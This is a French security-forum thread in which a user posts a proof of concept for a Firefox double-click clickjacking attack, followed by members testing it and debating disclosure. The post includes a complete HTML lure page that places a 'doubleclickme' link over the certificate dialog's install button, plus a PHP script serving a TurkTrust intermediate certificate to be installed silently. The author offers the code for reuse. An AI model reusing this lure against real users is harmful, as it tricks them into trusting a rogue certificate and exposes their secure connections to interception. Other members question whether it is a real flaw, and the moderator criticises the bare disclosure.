Mozilla Firefox Install malicious certificate clickjacking

[j0-c]

Video youtube du PoC en action =>

Voila je poste ici une petite vulnérabilité que j'ai dèja signalé sur bugzilla.mozilla.org unpeu plus importante que la dernière, celle ci permet d'installé un certificat SSL et donc même si celui ci est factice ou obsolète, il permet de visiter des site web sécurisé via le même type de certificat.

Le clickjacking consiste a double cliquer sur un lien , au premier clique une boite d'installation de certificat apparaitra et au deuxième clique le certificat sera installé.

Pour l'instant je poste juste des petites failles pour tester la fiabilité du forum , voir si il n'y a pas de personne qui publie ceci à leur nom sur divers autres sites mais si la confiance se fait je vais alors pouvoir vous donner d'avantage de vulnérabilité beaucoup plus importante .

Code PHP :

<!doctype html>
<html lang="fr">
<head>
    <meta charset="utf-8">
    <title>0day</title>
    <style media="screen">

    /* IMPORTANT */
    html {
        height: 100%;
    }
    body {
        height: 100%;
        margin: 0;
        padding: 0;
    }
    #page-table {
        height: 100%;
        width: 100%;
        border-collapse: collapse;
        text-align: center;
    }
    #page-td {
        height: 100%;
        padding: 0;
        vertical-align: middle;
    }
    div#global {
        width: 500px;
        margin: 20px auto;
        text-align: left;
    }

    /* COSM�TIQUE */
    body {
        background: black;
    }
    #page-table {
        background: black;
        color: white;
    }
    #page-table a {color: white;}
    div#global {
        padding: 10px 20px;
        background: black;
        border: 1px solid black;
        font-family: Arial, Helvetica, sans-serif;
    }


    </style>
</head>

<body>
<div id="layer1" style="width:442px; height:200px; position:absolute; left:10px; top:56px; z-index:1;">
    <p><font color="lime">0day exploit double-click-jacking install malicious 
    SSL Certificate</font></p>
</div>
<table id="page-table"><tr><td id="page-td">

<div id="global">
<table style="border-collapse:collapse;" cellspacing="0" width="424">
            <tr>
                <td width="150" height="119" style="border-width:0; border-color:black; border-style:solid;">
                    <p>&nbsp;</p>
                </td>
            </tr>
            <tr>
                <td width="150" height="23" style="border-width:0; border-color:black; border-style:solid;">
                    <p align="right"><a onmousedown="document.location='./156.php';" href="#"><span style="font-size:8pt;">doubleclickme</span></a></td>
            </tr>
        </table>
</div><!--#global-->

</td></tr></table><!--#page-table-->

</body>
</html> 


---
156.php

Code PHP :

<?php
Header("Content-type: application/x-x509-ca-cert"); //no comment
Header("Content-Disposition: inline; filename=turktrust-intermediate-2.pem"); 
readfile("turktrust-intermediate-2.pem"); 
?>

---
turktrust-intermediate-2.pem
certificate : http://alternativ-testing.fr/Research/Mo...iate-2.pem


Live PoC : http://alternativ-testing.fr/Research/Mo...icate2.htm#

[gruik]

déplacé dans la catégorie Security

[j0-c]

okay désolé pour le dérangement.

[InstinctHack]

Salut,

test sous Firefox 23.0 Linux.
Déjà faut javascript d'activé, c'est pas mon cas :] mais un lien html normal aura le meme effet.
L'effet de produire le résultat attendu par les dev :
un clic : affichage de la boite de dialogue.
double-clic : affichage de la boite de dialogue.
Et rien de plus dans les certificats.

[j0-c]

essais sous windows 7 j'ai pas testé sur mon ubuntu

---

Je sais que ce que je reporte est valide puisqu'il a été confirmé par l'équipe de programmeur de mozilla.

---

Normalement l'endroit ou tu double clique est placer au même endroit que le bouton d'installation du certificat dans la boite d'installation qui est apparut.

---

sous windows 7 c'est bien le cas si tu as ta barre personnelle d'onglet activé.

[Polo]

Haha pas de bol, chez moi (Arch et FF 23.0) ça tombe pile poil en face du bouton Cancel :')

[j0-c]

le code source est libre a toi de changer ce qui ne va pas pour que sa marche chez toi

[InstinctHack]

Il n'en reste pas moins que c'est pas réellement une faille. Humaine peut-être.
On double-clic pas sur un lien dans un navigateur. (si ? :O )

Et tu dis que la faille as était validé par l'équipe de dévellopeur. Ok.
Ils vont faire quoi pour la "corriger" ? Mettre un timeout ?

Ca reste un problème humain à mes yeux. Si je me trompe dites-le moi

[ark]

On double-clic pas sur un clic dans un navigateur. (si ? :O )

Je t'assure que Mme Michu elle sait jamais quand il faut cliquer ou double cliquer, du coup elle double clique partout.

[j0-c]

Il n'en reste pas moins que c'est pas réellement une faille. Humaine peut-être.
On double-clic pas sur un clic dans un navigateur. (si ? :O )

biensure que si il y a même des "event" en javascript pour gérer les double clique.

le double clique se veut une action courante.

[gruik]

l'un dans l'autre disons qu'un post taggé "vuln dans ffox" et qui explique finalement juste une technique utilisée par les pirates sans expliquer d'où elle vient ni comment elle fonctionne, perso ça m'excite pas plus que ça je dois avouer

en terme de confiance je pense pas que les gens d'ici soient de ce genre à faire de la récup en mettant leur nom dessus, sinon dans tous les cas quel intérêt de venir poster sur un forum comme celui-ci ?
n-pn se veut plus orienté "compréhension" que "divulgation", c'est tout le propos de l'orientation "white-hat" n'est-ce pas...

de fait n-pn n'est pas un clone de exploitdb, en revanche si tu te sens de nous faire un tuto sur le heap-spraying, l'architecture de sécurité de firefox ou la sécurité des plugins depuis leur upload sur addons.mozilla jusqu'à l'installation par l'utilisateur etc. ça serait clairement bienvenu
je le répète, je m'interroge sur ta démarche qui, en tant que professionnel, est assez peu orthodoxe...

[j0-c]

biensure que si j'ai expliquer comment celle ci fonctionne même si j'ai été bref.

ma démarche est simple : partager de temps en temps le fruit de mes recherches ensuite même sans trop développer dessus du moment qu'on a le code je pense qu'on peut se débrouiller.

c'est bete de me décourager a se stade alors que j'en ai d'autres sous le bras nettement plus interessantes que je comptait peutetre poster ici.

[InstinctHack]

@j0-c
Quelques remarques personnelles.
Le forum compte 470 membres validés, dans le lot il y as surement quelques idiots qui vont essayer de se valoriser à yeux d'autres avec ce que tu poste. Mais c'est partout pareil, un script-kiddie qui trouve un beug encore actif sur bugzilla peut l'utiliser. Si tu veut vraiment empecher ça, ne poste null part.

Et même si les deux trucs que tu as postés reste à mes yeux des beugs plutôt que des failles, ils sont intéressants à lire. Il manque peut-être un peu d'explication comme l'as dit gruik, mais je pense aussi qu'ayant le code (et qu'il soit court de plus...) permet à chacun de faire le cheminement logique pour comprendre comment cela fonctionne.

[j0-c]

l'un dans l'autre disons qu'un post taggé "vuln dans ffox" et qui explique finalement juste une technique utilisée par les pirates sans expliquer d'où elle vient ni comment elle fonctionne

Et même si les deux trucs que tu as postés reste à mes yeux des beugs plutôt que des failles

Ce n'est pas une technique ni un simple bug mais une vulnérabilité a part entière qui nécéssite une certaine interaction . quand le code source laisse place a des interaction malveillante pour l'utilisateur on appel sa une vulnérabilité.
Elle vien d'ou? de mes recherche biensure.
Elle marche comment? je l'ai déja expliqué

[gruik]

d'ac merci pour ces précisions.